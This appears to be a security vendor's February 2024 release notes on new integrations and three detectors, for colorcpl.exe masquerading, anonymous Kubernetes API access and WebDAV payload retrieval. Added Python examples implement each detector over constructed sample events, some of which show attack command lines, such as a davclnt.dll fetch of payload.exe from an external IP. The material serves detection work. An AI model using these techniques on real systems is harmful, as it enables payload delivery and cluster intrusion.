February 2024

Product updates

Data source tagging

Hunters allows you to add an additional information layer to your connected data flows by adding tags to each data flow. These tags can be used to add business context to data flows and allow you to locate and monitor the right data flows without redundant hassle.

Once data flows are tagged, you can filter leads, alerts, and stories by data source tags.


Learn more about data source tagging.

New column in Detector export file

We’ve enhanced the CSV file of the exported detector settings. Now, when exporting detector settings from the Detectors page, the CSV file will include a MITRE Technique ID column which will allow you to track the detectors’ MITRE Technique coverage based on the Technique ID in addition to the existing Technique name.


Integrations

VMware NSX Avi Logs

VMware NSX Avi is a self-service Multi-Cloud Application Services Platform that ensures consistent application delivery, bringing software load balancers, web application firewall (WAF), and container Ingress for applications across data centers and clouds.

The new integration includes:

  • Ingestion of the data to the data lake
  • Mapping of the data to the Hunters Web Requests schema
  • Mapping of the data to IOC Search

Learn more here

Axis Security

Axis Atmos Cloud securely connects any user to any business application or resource, via a centrally managed service. Axis audit logs contain various actions made by users, such as ZTNA logs, DNS Requests, SWG events, IPSEC Filtering, etc.

The new integration includes:

  • Ingestion of the data to the data lake
  • Mapping of the data to the Hunters DNS and Web Requests schemas
  • Mapping of the data to IOC Search

Learn more here

Netography

Netography is a cloud-native Network Defense Platform (NDP) that provides real-time detection and response to anomalies and threats across hybrid, multi-cloud, and on-prem networks from a single console without deploying sensors, agents, or taps.

The new integration includes:

  • Ingestion of the data to the data lake
  • Generating a 3rd party alert over the data
  • Mapping of the data to IOC Search

Learn more here

Cisco ISE

Cisco Identity Services Engine (ISE) is an identity-based network access control and policy enforcement system. It functions as a common policy engine that enables endpoint access control and network device administration for enterprises.

The new integration includes:

  • Ingestion of the data to the data lake
  • Mapping of the data to the Hunters login schema
  • Mapping of the data to IOC Search

Learn more here

SilverPeak

SilverPeak's Unity EdgeConnect Portfolio creates an SD-WAN fabric that provides secure connectivity with private-line performance, interconnecting enterprise locations with public clouds, private clouds, and service provider-hosted services.

The new integration includes:

  • Ingestion of the data from S3 to the data lake
  • Mapping of the data to the Hunters Network Schema
  • Mapping of the data to IOC Search

Learn more here

SentinelOne Custom Rules

Hunters’ SentinelOne integration offering now includes Custom Rule Alerts which include all alerts raised from custom rules.

The new integration includes:

  • Ingestion of the data to the data lake
  • Mapping of the data to IOC Search
  • Generating a 3rd party alert over the data

Learn more here

Island

Island Browser is a Chromium-based enterprise browser designed to enhance corporate security and IT governance. It enables enterprises to control and monitor how users interact with web applications, focusing on preventing data leakage and enforcing security policies.

This integration includes:

  • Ingestion of 3 data types into the data lake
  • Mapping Island timeline logs to IOC Search

Learn more here


Detection

New Detectors

🔎 Masquerading of file directory using colorcpl.exe

Detector ID: edr_directory_masquerading_using_colorcpl

The colorcpl.exe executable is a command-line utility that launches the Windows Color Management interface. When no parameters are specified it simply opens the interface. However, when a file parameter is provided, colorcpl.exe copies that file to the c:\windows\system32\spool\drivers\color directory. This behavior might be exploited to conceal files and bypass security measures by executing files from unconventional locations.
This new detector aims to detect suspicious use of colorcpl.exe, i.e. invocations with unexpected file parameters such as executables and scripts. Based on Axon research, the colorcpl.exe binary is usually executed without a target file parameter, except for Icon files such as icc, icm, cdm and gmmp.
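
The allowlist logic described above, as an added example that is not part of the original release notes or Hunters' detector code: it runs over constructed EDR process-creation events (the `image` and `command_line` field names and the sample paths are assumptions) and flags colorcpl.exe invocations whose file parameter has an extension outside the expected set.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Extensions colorcpl.exe is normally given, per the detector description above.
EXPECTED_EXTENSIONS = {"icc", "icm", "cdm", "gmmp"}


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows command-line tokenizer: keeps double-quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def colorcpl_file_argument(event: Dict) -> Optional[str]:
    """Return the file parameter passed to colorcpl.exe, or None if there is none."""
    image = PureWindowsPath(event.get("image", "")).name.lower()
    if image != "colorcpl.exe":
        return None
    args = split_windows_cmdline(event.get("command_line", ""))[1:]
    # Ignore switches; the first remaining token is treated as the file parameter.
    params = [a for a in args if not a.startswith(("/", "-"))]
    return params[0] if params else None


def is_suspicious_colorcpl(event: Dict) -> bool:
    """True when colorcpl.exe was given a file whose extension is not an expected one."""
    target = colorcpl_file_argument(event)
    if target is None:
        return False  # launched without a file parameter: the benign default use
    ext = PureWindowsPath(target).suffix.lstrip(".").lower()
    return ext not in EXPECTED_EXTENSIONS


def find_suspicious(events: List[Dict]) -> List[str]:
    """Command lines of all events the detector would raise."""
    return [e["command_line"] for e in events if is_suspicious_colorcpl(e)]


# Constructed sample EDR process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\colorcpl.exe", "command_line": "colorcpl.exe"},
    {"image": r"C:\Windows\System32\colorcpl.exe",
     "command_line": r'colorcpl.exe "C:\Users\alice\Downloads\sRGB.icm"'},
    {"image": r"C:\Windows\System32\colorcpl.exe",
     "command_line": r"colorcpl.exe C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"image": r"C:\Windows\System32\colorcpl.exe",
     "command_line": r'colorcpl.exe "C:\Users\alice\Downloads\run.ps1"'},
    {"image": r"C:\Windows\System32\notepad.exe", "command_line": r"notepad.exe C:\tmp\x.exe"},
]

if __name__ == "__main__":
    for cmd in find_suspicious(SAMPLE_EVENTS):
        print("ALERT colorcpl.exe directory masquerading:", cmd)
```

Pairing a hit with a subsequent file-creation event under spool\drivers\color for the same process confirms the copy actually happened and is a natural second stage for triage.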

🔎 Authorization of Kubernetes API request by an unauthenticated user

Detector ID: k8s_anonymous_authorized_request

Authorization of Kubernetes API requests initiated by unauthenticated users should generally be restricted to specific internal uses of Kubernetes (e.g. livez, healthz, readyz). An allowed request by an unauthenticated user (i.e. system:anonymous) for any other purpose might indicate malicious activity abusing a permissions misconfiguration.

This new detector detects authorization of Kubernetes API Requests initiated by unauthenticated users.

In addition, we’ve created two new Kubernetes enrichments:

  • Creation of RoleBinding & Role authorizing the Kubernetes API request (k8s_allowed_request_to_rolebinding_creation) - Each Kubernetes API request is allowed based on RBAC RoleBinding / ClusterRoleBinding & Role / ClusterRole authorizing it.
  • Activity done by an IP Address in Kubernetes API server logs (ip_k8s_activity) - All the requests done by an IP address in Kubernetes API server logs in the last 30 days.

Recommended investigation steps:

  • Who created the RoleBinding for system:anonymous user which allowed the request?
  • Is the user agent suspicious or anomalous?
  • What other Kubernetes API requests did the initiating IP make before and after this request?
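
The detection and the triage fields from the investigation steps above, as an added example that is not part of the original release notes or Hunters' detector code. It reads kube-apiserver audit events in JSON-lines form (the field names `user.username`, `requestURI`, `sourceIPs`, `userAgent` and the `authorization.k8s.io/decision` annotation are standard audit-log fields); the log lines themselves are constructed, and the binding names in them are made up.

```python
import json
from typing import Dict, List
from urllib.parse import urlsplit

# Health-probe paths that anonymous callers legitimately reach (from the detector description).
ALLOWED_ANONYMOUS_PATHS = {"/livez", "/healthz", "/readyz"}
ANONYMOUS_USER = "system:anonymous"


def is_anonymous_authorized_request(entry: Dict) -> bool:
    """Flag audit events where system:anonymous was *allowed* a request outside the health endpoints."""
    user = entry.get("user", {}).get("username")
    decision = entry.get("annotations", {}).get("authorization.k8s.io/decision")
    path = urlsplit(entry.get("requestURI", "")).path
    return user == ANONYMOUS_USER and decision == "allow" and path not in ALLOWED_ANONYMOUS_PATHS


def triage_fields(entry: Dict) -> Dict:
    """Pull the fields the investigation steps ask about: source IP, user agent, verb, path, RBAC reason."""
    return {
        "sourceIP": (entry.get("sourceIPs") or ["?"])[0],
        "userAgent": entry.get("userAgent", ""),
        "verb": entry.get("verb", ""),
        "path": urlsplit(entry.get("requestURI", "")).path,
        # The reason annotation names the (Cluster)RoleBinding that authorized the call.
        "reason": entry.get("annotations", {}).get("authorization.k8s.io/reason", ""),
    }


def detect_anonymous_requests(audit_jsonl: str) -> List[Dict]:
    """Run the detector over a JSON-lines audit log and return triage records for each hit."""
    hits = []
    for line in audit_jsonl.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        if is_anonymous_authorized_request(entry):
            hits.append(triage_fields(entry))
    return hits


# Constructed sample audit log (kube-apiserver audit event shape); not real cluster data.
SAMPLE_AUDIT_LOG = """\
{"kind":"Event","stage":"ResponseComplete","requestURI":"/healthz","verb":"get","user":{"username":"system:anonymous","groups":["system:unauthenticated"]},"sourceIPs":["10.0.0.5"],"userAgent":"kube-probe/1.28","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \\"system:public-info-viewer\\""}}
{"kind":"Event","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/kube-system/secrets?limit=500","verb":"list","user":{"username":"system:anonymous","groups":["system:unauthenticated"]},"sourceIPs":["203.0.113.7"],"userAgent":"curl/8.4.0","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \\"anon-debug\\" of ClusterRole \\"secret-reader\\" to User \\"system:anonymous\\""}}
{"kind":"Event","stage":"ResponseComplete","requestURI":"/api/v1/pods","verb":"list","user":{"username":"system:anonymous","groups":["system:unauthenticated"]},"sourceIPs":["203.0.113.7"],"userAgent":"curl/8.4.0","annotations":{"authorization.k8s.io/decision":"forbid","authorization.k8s.io/reason":""}}
{"kind":"Event","stage":"ResponseComplete","requestURI":"/api/v1/pods","verb":"list","user":{"username":"alice","groups":["system:authenticated"]},"sourceIPs":["10.0.0.9"],"userAgent":"kubectl/v1.28.0","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \\"view-all\\""}}
"""

if __name__ == "__main__":
    for hit in detect_anonymous_requests(SAMPLE_AUDIT_LOG):
        print("ALERT anonymous authorized request:", hit)
```

Only the second line fires: the health probe is on the allowed list, the third request was forbidden, and the fourth came from an authenticated user. The returned `reason` field is the starting point for the first investigation step (who created that binding), and grouping other events by the same `sourceIP` answers the last one.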

🔎 Potential WebDAV Client DLL Payload Retrieval

Detector ID: edr_webdav_payload_retrieval

This new detector was developed after we identified a rising trend of WebDAV usage for malware distribution. This TTP was spotted in our recent InfoStealer campaign investigation and remained undetected by some EDRs.

This detector is built on the EDR process-creation schema and detects retrieval of a WebDAV-hosted payload through a request initiated by the WebClient service (identified by the WebDAV client DLL, davclnt.dll, on the command line) from a remote server that enforces WebDAV by specifying @<port/SSL> in the URI. This request may be initiated either when a user is tricked into clicking a file referencing a WebDAV-hosted payload, or programmatically as part of a prior stage of the attack. Threat actors use this technique to transfer their payloads and tools to compromised environments.
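
The command-line pattern described above, as an added example that is not part of the original release notes or Hunters' detector code: it looks for davclnt.dll on a process command line together with a host followed by `@SSL` or `@<port>`, and suppresses hosts on an assumed internal allowlist. The sample events, the `.corp.example` suffix and the `command_line`/`parent_image` field names are constructed assumptions, not captured telemetry.

```python
import re
from typing import Dict, List, Optional

# davclnt.dll on the command line identifies a WebClient (WebDAV redirector) request.
DAVCLNT_RE = re.compile(r"davclnt\.dll", re.IGNORECASE)
# A host immediately followed by "@SSL" or "@<port>" is the URI form that forces WebDAV.
WEBDAV_HOST_RE = re.compile(r"(?P<host>[A-Za-z0-9.-]+)@(?P<marker>SSL|\d{1,5})\b", re.IGNORECASE)

# Assumption: internal WebDAV servers (e.g. a document portal) are known and can be suppressed.
INTERNAL_HOST_SUFFIXES = (".corp.example",)


def extract_webdav_target(cmdline: str) -> Optional[Dict[str, str]]:
    """Return {host, marker} when the command line is a davclnt.dll request to an @port/@SSL host."""
    if not DAVCLNT_RE.search(cmdline):
        return None
    m = WEBDAV_HOST_RE.search(cmdline)
    if not m:
        return None
    return {"host": m.group("host").lower(), "marker": m.group("marker").upper()}


def is_internal_host(host: str) -> bool:
    return host.endswith(INTERNAL_HOST_SUFFIXES)


def detect_webdav_retrieval(events: List[Dict]) -> List[Dict]:
    """Run the detector over process-creation events; external WebDAV hosts become hits."""
    hits = []
    for ev in events:
        target = extract_webdav_target(ev.get("command_line", ""))
        if target and not is_internal_host(target["host"]):
            hits.append({"host": target["host"], "marker": target["marker"],
                         "parent": ev.get("parent_image", "")})
    return hits


# Constructed sample EDR process-creation events; the command lines imitate the shape
# of a WebClient-service request and are not real captures.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie files.corp.example "
                     r"http://files.corp.example@SSL/DavWWWRoot/docs/report.docx"},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 203.0.113.50 "
                     r"http://203.0.113.50@8080/share/payload.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Internet Explorer\iexplore.exe" https://intranet.corp.example/'},
]

if __name__ == "__main__":
    for hit in detect_webdav_retrieval(SAMPLE_EVENTS):
        print("ALERT WebDAV payload retrieval:", hit)
```

The first event resolves to an internal host and is suppressed, the third never touches davclnt.dll, and only the request to the external host on a non-standard port is raised. In practice the allowlist is the tuning knob: the `@SSL`/`@<port>` form is rare enough in most environments that everything outside known internal servers is worth a look.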